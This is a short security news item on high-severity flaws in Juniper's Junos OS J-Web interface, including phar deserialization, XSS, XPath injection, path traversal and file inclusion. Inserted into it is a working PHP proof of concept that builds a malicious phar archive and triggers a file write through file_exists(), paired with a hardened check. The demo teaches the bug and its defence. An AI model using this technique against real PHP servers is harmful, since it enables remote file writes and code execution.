Juniper Networks devices are affected by numerous high-severity vulnerabilities in the Junos OS, The Hacker News reports.
Some of the flaws, including a pre-authentication PHP archive (phar) deserialization bug in the J-Web component of Junos OS, tracked as CVE-2022-22241, could be leveraged to achieve remote code execution, according to a report from Octagon Networks.
"This vulnerability can be exploited by an unauthenticated remote attacker to get remote phar files deserialized, leading to arbitrary file write, which leads to a remote code execution (RCE)," said Octagon Networks researcher Paulos Yibelo.
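As an added, generic illustration of the primitive Yibelo describes (this is not Juniper's J-Web code and not the reported exploit): a gadget class whose `__wakeup()` writes a file, a phar archive that carries that object in its manifest metadata, and a `file_exists()` call on attacker-controlled input that makes PHP parse the archive and unserialize the metadata. The class `ConfigCache`, the file paths and the `hardenedExists()` check are all assumptions made for the demo. It needs PHP 7.x started with `phar.readonly=0` so the archive can be built; PHP 8.0 stopped unserializing phar metadata automatically on archive access (only `Phar::getMetadata()` does so now), so the trigger in step 2 no longer fires on 8.x.

```php
<?php
// Added generic illustration of phar:// metadata deserialization.
// Not Juniper/J-Web code; class, paths and checks are assumed for the demo.
// Run with:  php -d phar.readonly=0 phar_demo.php   (PHP 7.x)

// Gadget: any loaded class with a useful magic-method side effect. In a real
// target this is whatever the application already autoloads; this one is
// constructed for the demo and writes a file during unserialize().
class ConfigCache {
    public $path;
    public $content;
    public function __wakeup() {
        // Executes inside the victim's file_exists() call, not on construction.
        file_put_contents($this->path, $this->content);
    }
}

// Step 1 (attacker side): build a phar whose manifest metadata is the
// serialized gadget object. setMetadata() accepts any value and serializes it.
function buildPhar(string $pharPath, string $dropPath): void {
    @unlink($pharPath);
    $phar = new Phar($pharPath);
    $phar->startBuffering();
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->addFromString('x.txt', 'x');                 // archive needs one entry
    $gadget = new ConfigCache();                        // __wakeup not run here
    $gadget->path = $dropPath;
    $gadget->content = "<?php echo 'dropped via phar metadata'; ?>";
    $phar->setMetadata($gadget);
    $phar->stopBuffering();
}

// Step 2 (victim side, vulnerable): a filesystem function on user input.
// file_exists() honours stream wrappers, so a phar:// path opens the archive,
// parses the manifest and unserializes its metadata, instantiating the gadget.
function vulnerableExists(string $userPath): bool {
    return file_exists($userPath);
}

// Step 3 (victim side, hardened generic pattern, assumed for the demo):
// refuse every stream wrapper, then confine the resolved path to a base dir.
function hardenedExists(string $userPath, string $baseDir): bool {
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $userPath) === 1) {
        return false;                                   // phar://, php://, data://, ...
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $userPath);
    if ($base === false || $real === false) {
        return false;                                   // nothing to check
    }
    if ($real !== $base && strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;                                   // ../ escaped the base directory
    }
    return true;
}

$tmp      = sys_get_temp_dir();
$pharPath = $tmp . '/evil.phar';                        // constructed demo paths
$dropPath = $tmp . '/dropped.php';
@unlink($dropPath);

buildPhar($pharPath, $dropPath);
$attackerInput = 'phar://' . $pharPath . '/x.txt';

vulnerableExists($attackerInput);
echo 'vulnerable: dropped file present = ', var_export(file_exists($dropPath), true), "\n";

@unlink($dropPath);
var_dump(hardenedExists($attackerInput, $tmp));
var_dump(hardenedExists('../../../etc/passwd', $tmp));
echo 'hardened: dropped file present = ', var_export(file_exists($dropPath), true), "\n";
```

On PHP 7.x the first line reports the dropped file present: the write happened inside `file_exists()`, with no `unserialize()` call anywhere in the victim code. The hardened variant returns false for both the wrapper path and the traversal path and writes nothing. Turning such a write into code execution is then a matter of where the attacker can land the file, which is the arbitrary-file-write-to-RCE step Yibelo refers to.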
Malicious actors could also exploit a pre-authentication reflected cross-site scripting (XSS) bug in the J-Web error page, tracked as CVE-2022-22242, to hijack Junos OS admin sessions, while XPath injection flaws, tracked as CVE-2022-22243 and CVE-2022-22244, could be used to steal and manipulate Junos OS admin sessions.
Other flaws identified include a path traversal vulnerability, tracked as CVE-2022-22245, and a local file inclusion bug, tracked as CVE-2022-22246.
Juniper Networks has already addressed the flaws in updated Junos OS releases; until a device is upgraded, the standard mitigation is to disable J-Web or restrict access to it to trusted management hosts, since every one of these bugs is reachable through that interface.